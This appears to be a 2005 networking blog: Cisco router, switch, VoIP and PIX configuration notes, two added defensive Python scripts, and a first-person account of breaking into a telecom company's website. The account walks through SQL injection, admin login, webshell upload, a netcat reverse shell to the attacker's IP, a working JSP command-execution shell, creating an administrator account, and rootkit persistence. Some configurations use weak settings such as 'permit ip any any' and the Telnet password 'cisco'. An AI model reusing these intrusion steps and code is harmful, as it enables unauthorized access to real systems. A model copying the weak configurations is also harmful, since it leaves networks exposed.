2005-07-27

I. Basic router verification commands

show version

show processes

show protocols

show mem

show ip route

show startup-config

show running-config

show flash

show interfaces

II. Basic router configuration commands

Entering configuration mode: config terminal/memory/network

Commands commonly used when configuring: copy and load

1. Hostname: hostname name

2. Login banner: banner text

3. Interface: interface port

4. Passwords: line 0 6

login

password password

enable password/secret password

5. Interfaces:

1) Configuring a port

interface port

clock rate rate (e.g. 64000) /* on serial interfaces */

bandwidth kbps (default 56) /* on serial interfaces */

media-type type /* on Ethernet interfaces */

early-token-release /* on Token Ring interfaces */

ring-speed 16 /* on Token Ring interfaces */

no shutdown

write memory

2) Verifying a port

show interfaces

show controllers

6. Boot environment

1) Boot method

boot system flash IOS-filename

boot system tftp IOS-filename tftp-address

boot system rom

2) Configuration register

config-register 0x2102

7. Viewing neighbouring routers

show cdp interface

show cdp neighbors [detail]

show cdp entry routerA

8. IP address configuration

ip address address mask

ip host hostname address

ip name-server server-address-1 server-address-2 ...

ip domain-lookup nsap

show hosts

ping hostname|ip-address

trace hostname|ip-address

III. IP routing

1. Static routes

ip routing

ip route destination-network mask interface|next-hop [permanent]

2. Default route

ip default-network network

3. Dynamic routing

1) RIP configuration

router rip

network network

show ip route

show ip protocols

debug ip rip

2) OSPF configuration

router ospf process-id

redistribute other-protocol

network interface-network wildcard-mask area area-id

area area-id range network mask

area area-id default-cost cost

ip ospf priority number

ip ospf cost cost

show ip ospf database

3) BGP configuration

router bgp as-number

redistribute other-protocol

network network /* within the AS */

aggregate-address network mask summary-only /* summarised network */

neighbor neighbor-address remote-as as-number /* neighbour in another AS */

IV. Traffic control

1) Passive interfaces

passive-interface interface

2) Default route

ip default-network network|interface-network

3) Static routes

ip route destination-network mask interface|next-hop

4) ACL filtering

(global) access-list acl-number-1 {permit|deny} source wildcard-mask [established]

access-list acl-number-2 {permit|deny} ip|tcp source-network destination-network

operator operand

(on the interface) ip access-group acl-number in|out

distribute-list acl-number in|out interface

5) Null0 interface

ip route address mask null0

V. WAN configuration

1) PPP

ppp pap sent-username username password password /* requires encapsulation ppp */

ppp chap hostname hostname

ppp chap password password

2) X.25

encapsulation x25 [dce]

x25 address x.121-address

x25 map protocol address x.121-address /* SVC */

x25 pvc pvc-number ip ip-address x.121-address /* PVC */

ip switching

x25 route x.121-address interface interface mapped-x.121-address

3) Frame Relay

frame-relay local-dlci dlci

frame-relay map protocol address dlci

frame-relay lmi-type ansi

2005-07-26

Author: mecca_gs

Below is a VoIP configuration on a Cisco 3640. The customer runs VoIP between Beijing and Shantou, with an Alcatel PBX behind each router. There are many points worth noting here, shared for everyone's enjoyment!

3640 configuration on the Beijing side:
Beijing#sh run
Building configuration...

Current configuration:
!
version 12.0
service timestamps debug uptime (timestamp debug output)
service timestamps log uptime (timestamp log messages)
no service password-encryption (passwords are not encrypted)
!
hostname Beijing (hostname)
!
enable secret 5 $1$R.66$z.BUjhNsJcIr8KCcS9uxG.
!
!
!
!
!
voice-card 1 (define voice card 1)
!
voice-card 3 (define voice card 3)
!
ip subnet-zero
no ip domain-lookup
!
isdn voice-call-failure 0
!
!
!
!
controller E1 1/0 (configure the E1 voice card)
framing NO-CRC4
ds0-group 0 timeslots 1-15,17-31 type e&m-wink-start (define the voice card type as E&M)
cas-custom 0
!
controller E1 3/0 (configure the E1 voice card)
framing NO-CRC4
ds0-group 0 timeslots 1-15,17-31 type e&m-wink-start (define the voice card type as E&M)
cas-custom 0
!
!
!
interface BRI0/0
no ip address
no ip directed-broadcast
shutdown
isdn guard-timer 0 on-expiry accept
!
interface FastEthernet0/0
no ip address
no ip directed-broadcast
shutdown
duplex auto
speed auto
!
interface Serial0/0
description "Link to MainLand_Shantou by NCIC lease line"
ip address 192.168.1.1 255.255.255.252
no ip directed-broadcast
no ip mroute-cache
no fair-queue
!
interface Serial0/1
no ip address
no ip directed-broadcast
shutdown
clockrate 2000000
!
ip classless
no ip http server
!
!
voice-port 1/0:0 (configure the analog voice port)
compand-type a-law
!
voice-port 3/0:0 (configure the analog voice port)
compand-type a-law
!
dial-peer voice 1 voip (define a VoIP dial peer)
destination-pattern +445... (assign the number pattern to the dial peer; . is a wildcard)
session target ipv4:192.168.1.2 (the VoIP route: the peer's IP address)
req-qos guaranteed-delay (RSVP guarantee for the voice stream; guaranteed-delay bounds the delay across the network)
ip precedence 5 (IP precedence; 5 is critical)
!
dial-peer voice 2 pots (define a POTS dial peer to the physical voice port)
destination-pattern +3... (numbers beginning with 3)
port 1/0:0 (the voice port)
!
dial-peer voice 3 pots (define a POTS dial peer to the physical voice port)
destination-pattern +3... (numbers beginning with 3)
port 3/0:0 (the voice port)
!
!
line con 0 (console login settings)
transport input none
line aux 0
line vty 0 4 (allow Telnet)
password cisco (the password is cisco)
login
!
end

Beijing#

3640 configuration on the Shantou side
Shantou#sh run
Building configuration...
Current configuration:
!
version 12.0
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Shantou
!
enable secret 5 $1$dB/c$tnrMU9IxFCJdix5ssHAdH/
!
!
!
!
!
voice-card 1
!
voice-card 2
!
ip subnet-zero
no ip domain-lookup
!
isdn voice-call-failure 0
!
!
!
!
controller E1 1/0
framing NO-CRC4
ds0-group 0 timeslots 1-15,17-31 type e&m-immediate-start
cas-custom 0
!
controller E1 2/0
framing N
ds0-group 0 timeslots 1-15,17-31 type e&m-immediate-start
cas-custom 0
!
!
!
interface BRI0/0
no ip address
no ip directed-broadcast
encapsulation ppp
isdn guard-timer 0 on-expiry accept
ppp multilink
!
interface FastEthernet0/0
no ip address
no ip directed-broadcast
shutdown
duplex auto
speed auto
!
interface Serial0/0
no ip address
no ip directed-broadcast
no ip mroute-cache
shutdown
no fair-queue
clockrate 2000000
!
interface Serial0/1
ip address 192.168.1.2 255.255.255.252
no ip directed-broadcast
!
ip classless
!
no ip http server
!
!
voice-port 1/0:0
compand-type a-law
!
voice-port 2/0:0
compand-type a-law
!
dial-peer voice 20 voip
destination-pattern +3...
session target ipv4:192.168.1.1
req-qos guaranteed-delay
ip precedence 5
!
dial-peer voice 10 pots
destination-pattern +448...
port 1/0:0
!
dial-peer voice 30 voip
destination-pattern +4...
session target ipv4:192.168.1.1
req-qos guaranteed-delay
ip precedence 5
!
dial-peer voice 40 pots
destination-pattern +449...
port 2/0:0
!
!
line con 0
transport input none
line aux 0
line vty 0 4
password cisco
login
!
end

Shantou#

Author: yuyeyo

The most common understanding of port security is controlling and managing network traffic by MAC address: binding a MAC address to a specific port, limiting how many MAC addresses a port will accept, or refusing frames from certain MAC addresses on a port. Taking port security a step further, network access can also be controlled with 802.1X.
First, binding MAC addresses to ports and permitting traffic by MAC address.
1. Binding a MAC address to a port: when the host's MAC address differs from the one configured on the switch, the corresponding port is shut down. The port must be in access or trunk mode before a MAC address can be assigned to it.
3550-1#conf t
3550-1(config)#int f0/1
3550-1(config-if)#switchport mode access / set the port mode.
3550-1(config-if)#switchport port-security / enable port security on the port.
3550-1(config-if)#switchport port-security mac-address 0090.f510.79c1 / configure the MAC address.
3550-1(config-if)#switchport port-security maximum 1 / allow at most 1 MAC address on this port.
3550-1(config-if)#switchport port-security violation shutdown / shut the port down when the configuration is violated.

2. Limiting port traffic by MAC address count: this configuration allows at most 100 MAC addresses through a trunk port; beyond 100, frames from new hosts are dropped.
3550-1#conf t
3550-1(config)#int f0/1
3550-1(config-if)#switchport trunk encapsulation dot1q
3550-1(config-if)#switchport mode trunk / set the port mode to trunk.
3550-1(config-if)#switchport port-security / enable port security on the port.
3550-1(config-if)#switchport port-security maximum 100 / allow at most 100 MAC addresses on this port.
3550-1(config-if)#switchport port-security violation protect / when the host count exceeds 100 the switch keeps working, but frames from new hosts are dropped.

The configurations above permit traffic by MAC address; the ones below deny traffic by MAC address.

1. On Catalyst switches this configuration filters unicast traffic only; it has no effect on multicast.
3550-1#conf t
3550-1(config)#mac-address-table static 0090.f510.79c1 vlan 2 drop / drop the traffic in the given VLAN.
3550-1#conf t
3550-1(config)#mac-address-table static 0090.f510.79c1 vlan 2 int f0/1 / drop the traffic on the given interface.

Finally, the concepts and configuration of 802.1X.
The 802.1X authentication protocol was first used on wireless networks and only later on ordinary switches, routers and other network devices. It authenticates users per port: when a user's traffic tries to pass through a port configured for 802.1X, the user must authenticate and is allowed onto the network only if legitimate. The benefit is that internal users can be authenticated with a simple configuration, which can to some extent replace Windows AD.
To configure 802.1X authentication, AAA must first be enabled globally; this is much the same as using AAA at the network edge, except that the authentication protocol is 802.1X. Then 802.1X authentication must be enabled on the relevant interfaces. (It is recommended to enable 802.1X on all ports and to manage usernames and passwords on a RADIUS server.)
The configuration below uses local usernames and passwords for AAA authentication.
3550-1#conf t
3550-1(config)#aaa new-model / enable AAA.
3550-1(config)#aaa authentication dot1x default local / enable 802.1X authentication globally, using local usernames and passwords.
3550-1(config)#int range f0/1 - 24
3550-1(config-if-range)#dot1x port-control auto / enable 802.1X authentication on all interfaces.

Afterword
Controlling network traffic by MAC address can be done either with the configuration above or with access control lists; on the Catalyst 3550, for example, access lists numbered 700-799 filter by MAC address. But controlling traffic with access lists is rather cumbersome and seems rarely used, so it is not covered here.
MAC address binding provides some assurance for the internal network, but the effect is not great; 802.1X authentication is recommended instead. In terms of controllability and manageability, 802.1X is a good choice.

2005-07-23

PIX 515E firewall configuration
pixfirewall>en
pixfirewall#conf ter
pixfirewall(config)#
pixfirewall(config)#interface ethernet0 auto   bring up e0
pixfirewall(config)#interface ethernet1 auto   bring up e1
pixfirewall(config)#nameif ethernet0 outside security0   outside is the external interface
pixfirewall(config)#nameif ethernet1 inside security100   inside is the internal interface
pixfirewall(config)#ip address inside 10.11.45.1 255.255.255.0   set the inside interface IP address
pixfirewall(config)#ip address outside 218.52.57.82 255.255.248.0   set the outside interface IP address
pixfirewall(config)#access-list 100 permit ip any any   create an access list that permits everything
pixfirewall(config)#access-group 100 in interface outside   bind access list 100 inbound on the outside interface.
pixfirewall(config)#nat (inside) 1 10.11.45.0 255.255.255.0   define all hosts in network 10.11.45.0 with mask 255.255.255.0 as NAT group 1
pixfirewall(config)#global (outside) 1 218.52.57.83-218.52.57.86 netmask 255.255.255.0   translate the inside addresses defined by the nat command above into addresses from the external pool 218.52.57.83-218.12.47.86
pixfirewall(config)#static (inside,outside) 218.12.47.86 192.168.0.2   map the internal address 192.168.0.2 to the external address 218.12.47.86
pixfirewall(config)#conduit permit tcp host 218.52.57.86 eq www any   open a conduit so the outside can reach this external address on www, i.e. port 80
pixfirewall(config)#route outside 0.0.0.0 0.0.0.0 218.52.57.81
pixfirewall(config)#telnet 192.168.0.2 255.255.255.0 inside   allow the internal host 192.168.0.2 to telnet to the PIX; telnet from the outside is not allowed
pixfirewall(config)#enable password ********   privileged-mode password
pixfirewall(config)#password ******   telnet password
pixfirewall(config)#conduit permit icmp any any   allow ICMP, i.e. ping, through
pixfirewall(config)#write memory
2621 router configuration
router>en
router#conf ter
router(config)#int f0/0
router(config-if)#ip add 10.11.45.2 255.255.255.0
router(config-if)#no sh
router(config-if)#ip nat outside
router(config-if)#int f0/1
router(config-if)#no sh
router(config-if)#ip nat inside
router(config-if)#int f0/1.192   enter the subinterface
router(config-subif)#encapsulation dot1q 2   set the encapsulation type; 2 is the VLAN id
router(config-subif)#ip add 192.168.0.1 255.255.255.0   set the IP address
router(config-subif)#int f0/1.172
router(config-subif)#encapsulation dot1q 3
router(config-subif)#ip add 172.16.0.1 255.255.255.0
By default the VLANs can reach each other
router(config)#access-list 100 deny ip 192.168.0.0 0.0.0.255 any
only lets 192.168.0.0 reach its own segment
router(config)#access-list 100 permit ip any any
allow the other segments to reach each other
router(config)#access-list 100 permit ip host 192.168.0.1 any
allow any host to reach the outside via 192.168.0.1
router(config)#ip route 0.0.0.0 0.0.0.0 10.11.45.1
router(config)#access-list 1 permit any
router(config)#ip nat pool rjt 10.11.46.2 10.11.45.254 netmask 255.255.255.0
router(config)#ip nat inside source list 1 pool rjt overload

router(config)#ip nat inside source static 192.168.0.2 218.12.47.83   map the internal address to the external one
router#copy run start

Router/switch hostname and password settings
router(config)#hostname #####
router(config)#password ******
router(config)#enable password ******
Telnet on the router
router(config)#line vty 0 4
router(config-line)#login
router(config-line)#password ******
router(config-if)#ip add 192.168.1.1 255.255.255.0 secondary   configure a second IP address on a router interface
If the router configuration will not save
config-register 0x2102
end
write
reload
2950 switch configuration
switch>en   enter privileged mode
switch#conf ter   enter configuration mode
switch(config)#interface vlan 1
switch(config-if)#ip add 192.168.100.1 255.255.255.0   set the switch IP address
switch#vlan database   enter VLAN configuration mode
switch(vlan)#vtp domain domain-name   create the VTP domain
switch(vlan)#vtp server   set the VTP mode
switch(vlan)#vlan vlan-id name vlan-name   create and name a VLAN
switch(vlan)#exit
switch(config)#interface switch-interface   enter interface configuration mode
switch(config-if)#switchport mode access   set the port type
switch(config-if)#switchport access vlan vlan-id   add the port to the VLAN
switch(config-if)#interface switch-interface
switch(config-if)#switchport mode trunk   configure trunk mode
switch(config)#enable password ******
Telnet configuration on the switch
switch(config)#line vty 0 4   enable the remote terminals
switch(config-line)#login
switch(config-line)#password ******
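As an added example (not part of the posts above), a small Python auditor that reads an IOS/PIX-style configuration and reports the weak settings visible in the configurations on this page: `no service password-encryption`, a reversible `enable password`, a shared `password` on the vty lines with Telnet left open, `access-list ... permit ... any any` and `conduit permit ... any any`, and port-security parameters set without the `switchport port-security` enabling command. The sample configuration is constructed from lines lifted from the posts above.

```python
"""Audit an IOS/PIX-style configuration for the weak settings seen in the posts above.

Added example; the sample config below is constructed from lines in those posts.
"""
import re

SAMPLE_CONFIG = """\
hostname Beijing
no service password-encryption
enable password cisco123
!
interface FastEthernet0/1
 switchport mode access
 switchport port-security mac-address 0090.f510.79c1
 switchport port-security maximum 1
 switchport port-security violation shutdown
!
access-list 100 permit ip any any
access-group 100 in interface outside
conduit permit icmp any any
!
line vty 0 4
 password cisco
 login
!
end
"""

ANY_ACL = re.compile(r"access-list\s+(\S+)\s+permit\s+(?:(\S+)\s+)?any\s+any\b")
ANY_CONDUIT = re.compile(r"conduit\s+permit\s+(\S+)\s+any\s+any\b")


def parse_blocks(text):
    """Split a config into (header, [indented child lines]) stanzas.

    Unindented lines start a stanza; indented lines belong to the last one,
    so a global command is simply a stanza with no children.
    """
    blocks = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "!":
            continue
        if raw[0].isspace() and blocks:
            blocks[-1][1].append(line)
        else:
            blocks.append((line, []))
    return blocks


def audit(text):
    """Return a list of human-readable findings for the given config text."""
    findings = []
    blocks = parse_blocks(text)
    headers = [h for h, _ in blocks]

    if "no service password-encryption" in headers:
        findings.append("global: line passwords stored in clear text (no service password-encryption)")

    for header, body in blocks:
        if header.startswith("enable password "):
            findings.append("global: reversible 'enable password'; use 'enable secret'")

        if header.startswith("interface "):
            # Parameters alone do nothing: the feature needs 'switchport port-security'.
            if any(l.startswith("switchport port-security ") for l in body) \
                    and "switchport port-security" not in body:
                findings.append(f"{header}: port-security parameters set but feature not enabled")

        if header.startswith("line vty"):
            if any(l.startswith("password ") for l in body) and "login local" not in body:
                findings.append(f"{header}: shared line password, no per-user authentication")
            if not any(l.startswith("transport input") and "ssh" in l for l in body):
                findings.append(f"{header}: Telnet not restricted (no 'transport input ssh')")

        m = ANY_ACL.match(header)
        if m:
            findings.append(f"access-list {m.group(1)}: permits {m.group(2) or 'all'} any -> any")
        m = ANY_CONDUIT.match(header)
        if m:
            findings.append(f"conduit: {m.group(1)} allowed from any to any")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```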

Penetrating XX Telecom and gaining full privileges
Author: Andyower
Half a year ago I broke into ** Telecom; back then I only left a webshell and ran. Recently I went back to look and it was gone. Nothing to do but start over, frustrated again.
Open http://www.****le.com, the ** Telecom site, and open any news item
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
Try appending a ' at the end,
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0′
Frustrated yet again: it's filtered, the normal page comes back. Submit again
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0 and 1=2

Still the normal page....
Wait, this link looks familiar, I've seen it somewhere before...
Since I'm not very familiar with these article systems, and my memory is really, really bad..... (one cigarette later)
Finally I remember: I've broken into this same article system before. Haha, that makes it easy, dig out the old method. What I remember most is that the passwords are stored in plain text, which is rare these days (now I know which article system it is: Huixin News Management System)
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343′&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
(The NewsID variable isn't filtered. Heh, I remember a year and a half ago I didn't have NBSI at all and guessed the account and password by hand; hard work. People today are lucky....)
Haha, here it comes
HTTP 500.100 – 内部服务器错误 – ASP 错误
Then submit
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343 and 1=1&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
Yes! Normal page!
Submit again
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343 and 1=2&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
HTTP 500.100 – 内部服务器错误 – ASP 错误
Sweet, there's hope.
No way I'm going back to the stone age......
Change the link a bit
The original is
http://www.****le.com/newsxp/ReadNews.asp?NewsID=343&BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0
change it to
http://www.****le.com/newsxp/ReadNews.asp?BigClassName=新闻中心&SmallClassName=省内新闻&SpecialID=0&NewsID=343
Move NewsID=343 to the end so NBSI can crack the password automatically
Open NBSI and let it run
Another cigarette; by the time it's finished, the password is out ^_^
[id]:13 [username]:order [passwd]:leader
Heh, now find the admin backend
Try
http://www.****le.com/newsxp/admin
Result:
Directory Listing Denied
This Virtual Directory does not allow contents to be listed.
The directory exists
Submit:
http://www.****le.com/newsxp/admin/login.asp
Haha, there it is, asking for an account and password
Enter the account and password NBSI found
I'm in. First thing: upload a webshell
All too familiar; I find
· Upload management ·
Other image/text upload
Because here, as I tried before, any file can be uploaded, including *.asp of course
Found a webshell and submitted it
Ugh!

Page cannot be found
The admin deleted this upload page. Hateful, despicable admin, even more despicable than Vanishs............
No choice; look carefully around the admin interface
I see File Management
Without any hope I clicked it, because before, that page had been deleted
Even so, it has to be tried
Frustrated again..
Well, the link does open
http://www.****le.com/newsxp/webedit/index.asp
Another login box pops up asking for an account and password
But underneath
there's this

Admin: master Password: 123
Give it a try
.......
What a lovable admin...
Letting me in this easily....


Whatever, upload right away: choose the webshell, click Upload
&&***%&$$#$#
Result
HTTP 500.100 – 内部服务器错误 – ASP 错误

Back in the admin page there's a jump box; enter c:\
to see whether it can be used directly as a webshell; the result is
目录中有非法字符
No choice but to modify one of its files and turn an asp file into the webshell directly, since there's an edit function
Pick any file; I chose 1.asp
Then copy: there's a copy button at the very top, just left of the scissors
Then on the left open any directory; I clicked admin
Then click the paste icon to the right of the scissors...
A bucket of cold water:
HTTP 500.100 – 内部服务器错误 – ASP 错误
Could the directory be unwritable?

Then find a writable directory
The images directory must be writable, otherwise how did the admin upload so many images there
Jump to /admin/images/
Paste again
Damn!
Still
HTTP 500.100 – 内部服务器错误 – ASP 错误
No choice but to really overwrite a file
Find an unused file, write the webshell contents into it, then rename it to 1.asp
/include/计数器说明.txt
Heh, this file shouldn't be used anymore.
Note its timestamp and contents first
so I can restore them later with a tool
2004-2-23 19:26:00

OK! Rename succeeded; it's now 1.asp
So the directory is writable; it must be a problem in the program
The file management system must be buggy, otherwise copying files wouldn't fail.
Good, now write the webshell into it
Haha, it's written; let's see if it runs
http://www.****le.com/include/1.asp
Result....
Redirects straight back to
http://www.****le.com/
Damn!
What is this!
Could this directory be inaccessible too?
No way!
Try something in the same directory
http://www.****le.com/include/index1×1.gif
Huh! It displays fine!
Was it killed by antivirus? Or quarantined?
Impossible. I refresh again and edit 1.asp; it's still usable
So what's going on?
Change the contents of 1.asp to "Andyower" and see
Submit
http://www.****le.com/include/1.asp
It shows
Andyower
Speechless...
Brutal! Hateful, despicable admin, even more despicable than Vanishs......
Done cursing, I feel much better :) I find this a good way to vent, haha, learned it from Hacker Defense.
Try some small trojans; I took the Binghu Langzi Mini ASP Backdoor client 2.0 test version
Write the code in, then connect!
Heh! All the information comes out.
So it can run. Good, switch to a more powerful small trojan, Kandao's.
I dig and dig and dig! Straight away I see Haiyang
Try whether it works: edit the original 1.asp, paste Haiyang straight in, save
http://www.****le.com/include/1.asp
It works!
Huh! Has ASP Webmaster Assistant 6.0 been classed as a virus?
Pitiful.....
Run the cmd function and see!
netstat -an
Lots came out! Port 21 isn't open and neither is 3389
So no privilege escalation via SERV-U
Port 53 is open too, scary.....
8080 is open; has someone already broken in and made it a zombie? (Later I learned it was Resin, opened by Java)
Look through the other drives for anything usable
Found MySQL; upload a PHP trojan right away to see whether the default root can log in to MySQL
Disappointed again: the server has no PHP interpreter. Come to think of it, ASP should be able to connect to MySQL directly.
Searching Google I finally found 2 such articles, but since I'm a noob it didn't work; anyone who knows why, please tell Andyower. For space reasons they aren't listed.
Then I thought: bounce a shell and connect directly with mysql.exe, to see if root works (port 3306 is filtered).
Upload nc.exe to
d:\**teleweb\include\nc.exe
On my own machine
nc -vv -l -p 80
In Haiyang's cmd run
d:\**teleweb\include\nc.exe -e cmd.exe -e cmd MyIp 80
After a moment my nc responds
Good, get to work
cd d:\mysql\bin
mysql.exe -u root test

It ran, and the shell died. Heartbreaking! I thought this shell wouldn't be as flimsy as one from an overflow, but it still fell gloriously.
Dead end!
Dig some more, and I see another good thing
Resin, used to run JSP, heh!
There's hope: since MySQL is installed, JSP must be what operates it!
I've been digging for ages without seeing a single JSP file; digging further will kill me!
In cmd
dir /s d:\*.jsp
Let's see it hide now! Sure enough! There it is, in the d:\**teleweb\question directory!
Search slowly! Maybe I'll find the MySQL password, haha!
But after searching for ages there's no trace of a password. Forget it; I'll operate the database directly!
Found
the file d:\**teleweb\question\check.jsp
Found the key code
Delete everything unimportant.
I keep only
<%@page contentType="text/html; charset=gb2312" language="java" import="java.sql.*" import="java.util.*" import="java.io.*" import="news.ggExchange.*"%>
<jsp:useBean id="sdteledb" scope="application" class="sdteledb.sdteledb" />
<%sdteledb.setConnection();%>
<%
String sql2 = "select * from userinfo";
ResultSet rset2=sdteledb.executeQuery(sql2);
sdteledb.closeConn();
%>
Then save as hk.jsp
From now on I can just use String sql2 = "";
Write the SQL straight into it
String sql2 = "select id from userinfo into outfile ‘d:\**teleweb\question\1.txt’";
See if it works
http://www.****le.com/question/hk.jsp
Huh!
Error!!

500 Servlet Exception
Big brother, how can this be!
Dig out the old books and check; angel wrote it like this!
select * from table into outfile ‘c:/file.txt’
Look closely: it's the backslash problem! No wonder! When breaking into other PHP sites before, I never once managed an into outfile, and I kept cursing angel, saying he must have sold dog-skin plasters in a previous life.....
Now I find it was my own mistake, my own carelessness. Here I sincerely apologize to angel: sorry angel, I wronged you, so you didn't sell dog-skin plasters in a previous life ^_^
Good, fix the original code
Just use
select * from table into outfile ‘c:/file.txt’ then
Run
http://www.****le.com/question/hk.jsp

Returns blank! Go check the C drive
file.txt is lying there obediently. Safety first: delete!
Now let's see which admin logs in often
net user (Enter)
sdweb 上次登录           2005/1/14 下午 04:21
This admin seems fairly diligent; he's the one

Heh!

OK! I'll put an ntrootkit up right away so it runs as soon as the admin logs in. First use Haiyang to upload the configured ntrootkit to his d:\resin directory
And then!
<%@page contentType="text/html; charset=gb2312" language="java" import="java.sql.*" import="java.util.*" import="java.io.*" import="news.ggExchange.*"%>
<jsp:useBean id="sdteledb" scope="application" class="sdteledb.sdteledb" />
<%sdteledb.setConnection();%>
<%
String sql2 = "CREATE TABLE shell ( shell TEXT NOT NULL );";
sdteledb.executeQuery(sql2);
sql2 = "INSERT INTO shell ( shell ) VALUES (‘d:\\\\resin\\\\ntrootkit.exe’);";
sdteledb.executeQuery(sql2);
sql2 = "SELECT * FROM shell into outfile ‘SELECT * FROM shell into outfile ‘C:\Documents and Settings\sdweb\ 「开始」菜单 \程序\启动\shell.bat’;";
sdteledb.executeQuery(sql2);
sql2 = "drop TABLE shell;";
sdteledb.executeQuery(sql2);
sdteledb.closeConn();
%>


About sql2 = "INSERT INTO shell ( shell ) VALUES (‘d:\\\\resin\\\\ntrootkit.exe’);"
Why add 4 "\" in the path: when I first started I tested 1 to 3 and none of them inserted "d:\resin\ntrootkit.exe" into the table correctly; with what I wrote, the content of shell.bat is
d:\\resin\\ntrootkit.exe

Although there's an extra "\", it still runs correctly.
The rest of the time is just waiting, waiting for the admin to reboot and log in again.
Meanwhile, bored, I remembered an article by brother lcx and brother pinkeyes: on Linux they got root directly with a JSP trojan. Could it work on Windows too? If so there'd be no need to wait! Dig out the JSP trojan right away.
Edit d:\**teleweb\question\hk.jsp
Write the code below into it
<%@ page import="java.io.*" %>
<%
  try {
        String cmd = request.getParameter("cmd");
        Process child = Runtime.getRuntime().exec(cmd);
        InputStream in = child.getInputStream();
        int c;
        while ((c = in.read()) != -1) {
          out.print((char)c);
        }
        in.close();
        try {
          child.waitFor();
        } catch (InterruptedException e) {
          e.printStackTrace();
        }
    } catch (IOException e) {
        System.err.println(e);
    }
%>

Submit
http://www.****le.com/question/hk.jsp?cmd=net%20user%20Andyower%201111%20/add
Figure 5


Submit again
http://www.****le.com/question/hk.jsp?cmd=net%20LOCALGROUP%20Administrators%20Andyower%20/add

Success!
In Haiyang's cmd
net user Andyower
have a look


See that?
Admin privileges!
I really didn't expect JSP on Windows to run with such high privileges!
The article ends here; the rest is simple, and I don't want to intrude further. After all, I don't want to be thrown in jail; I'm still young ^=^
Postscript: while going through the files I saw that ** Telecom's forum is Dvbbs and the default database hadn't been changed; although the forum couldn't be entered normally, the database could still be downloaded. The news system's default database hadn't been changed either.



Addendum: this is also something I wrote a while ago, sigh... my skills aren't good enough...... so it's been kept until now.
There were originally pictures, but nowhere to put them, so they had to be left out...
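From the defender's side, the probes in the write-up above leave a distinctive trail in the IIS logs: a quote or `and 1=1`/`and 1=2` appended to a numeric parameter such as `NewsID`, a 500 response to the malformed request, and later a `cmd=` parameter carrying `net user` / `net localgroup`. The Python below is an added example (not from the article or the site it describes) that scans constructed W3C-format log lines for exactly those patterns and groups the hits by client address.

```python
"""Flag the SQL-injection probes and web-shell commands from the write-up in IIS W3C logs.

Added example; the log lines below are constructed, with RFC 5737 documentation addresses.
"""
import re
from urllib.parse import parse_qs

# Constructed sample in IIS W3C extended format (fields as declared on the first line).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2005-01-14 16:20:01 203.0.113.7 GET /newsxp/ReadNews.asp NewsID=343&BigClassName=x&SpecialID=0 200
2005-01-14 16:20:09 203.0.113.7 GET /newsxp/ReadNews.asp NewsID=343'&BigClassName=x&SpecialID=0 500
2005-01-14 16:20:15 203.0.113.7 GET /newsxp/ReadNews.asp NewsID=343+and+1=1&BigClassName=x 200
2005-01-14 16:20:21 203.0.113.7 GET /newsxp/ReadNews.asp NewsID=343+and+1=2&BigClassName=x 500
2005-01-14 16:25:40 203.0.113.7 GET /question/hk.jsp cmd=net%20user%20attacker%201111%20/add 200
2005-01-14 16:30:02 198.51.100.5 GET /newsxp/ReadNews.asp NewsID=344&BigClassName=x 200
"""

# Parameters the application treats as integers; anything else in them is suspicious.
NUMERIC_PARAMS = {"newsid", "specialid", "id"}
BOOLEAN_PROBE = re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)
SHELL_COMMAND = re.compile(r"\b(net\s+(user|localgroup)|cmd(\.exe)?|whoami|netstat)\b", re.I)


def parse_line(line):
    """Return a dict for one W3C log entry, or None for directives and short lines."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 7:
        return None
    date, time, ip, method, stem, query, status = parts[:7]
    return {"ts": f"{date} {time}", "ip": ip, "method": method,
            "stem": stem, "query": query, "status": int(status)}


def classify(entry):
    """Return (kind, parameter, decoded value) tuples for suspicious parameters."""
    alerts = []
    # parse_qs splits on & and the first =, and percent-/plus-decodes the values,
    # so '343+and+1=1' becomes NewsID -> '343 and 1=1'.
    for name, values in parse_qs(entry["query"], keep_blank_values=True).items():
        for value in values:
            lname = name.lower()
            if lname in NUMERIC_PARAMS and not value.isdigit():
                if BOOLEAN_PROBE.search(value):
                    alerts.append(("boolean-probe", name, value))
                elif "'" in value:
                    alerts.append(("quote-probe", name, value))
                else:
                    alerts.append(("non-numeric", name, value))
            if lname == "cmd" and SHELL_COMMAND.search(value):
                alerts.append(("webshell-command", name, value))
    return alerts


def scan(log_text):
    """Group alerts by client IP, counting the 5xx responses the probes triggered."""
    report = {}
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        alerts = classify(entry)
        if not alerts:
            continue
        rec = report.setdefault(entry["ip"], {"alerts": [], "errors": 0})
        rec["alerts"].extend(alerts)
        if entry["status"] >= 500:
            rec["errors"] += 1
    return report


if __name__ == "__main__":
    for ip, rec in scan(SAMPLE_LOG).items():
        print(ip, rec["errors"], "server errors")
        for kind, name, value in rec["alerts"]:
            print(f"  {kind:17} {name}={value!r}")
```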

2005-07-22

From the official Cisco website
ip default-gateway

ip default-network

and ip route 0.0.0.0 0.0.0.0

ip default-gateway

The ip default-gateway command differs from the other two commands. It should only be used when ip routing is disabled on the Cisco router.

For instance, if the router is a host in the IP world, you can use this command to define a default gateway for it. You might also use this command when your low end Cisco router is in boot mode in order to TFTP a Cisco IOS Software image to the router. In boot mode, the router does not have ip routing enabled.

This example defines the router on IP address 172.16.15.4 as the default route:

ip default-gateway 172.16.15.4

ip default-network

